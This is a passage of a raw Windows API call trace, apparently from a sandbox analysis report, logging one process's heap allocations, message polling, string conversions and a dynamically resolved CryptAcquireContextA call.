hHeap=0x25c0000) returned 1 [0262.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0262.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0262.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0262.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0262.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0262.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0262.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0262.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0262.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0262.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0262.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0262.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.865] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0262.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0262.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0262.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0262.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0262.865] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0262.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa950 [0262.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0262.865] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0262.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0262.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0262.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0262.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0262.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0262.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0262.865] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0262.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0262.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0262.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0262.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0262.866] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0262.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0262.866] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0262.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0262.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0262.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0262.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0262.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0262.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0262.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0262.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0262.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0262.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0262.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0262.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0262.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0262.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0262.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0262.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0262.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0262.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0262.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0262.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0262.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0262.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.869] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0262.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0262.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0262.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0262.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0262.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0262.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0262.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0262.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0262.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466dd0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0262.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0262.870] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0262.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0262.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0262.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466dd0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0262.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0262.871] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0262.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0262.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3538 | out: hHeap=0x25c0000) returned 1 [0262.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0262.872] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2be8) returned 1 [0262.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0262.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0262.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0262.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0262.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0262.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0262.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0262.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0262.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0262.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0262.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0262.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0262.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0262.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0262.874] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0262.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0262.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0262.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0262.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0262.875] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0262.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0262.875] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0262.875] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0262.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0262.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0262.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0262.875] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0262.876] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.876] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0262.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0262.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0262.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0262.876] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.877] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.877] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.877] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0262.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0262.877] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0262.877] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0262.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0262.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 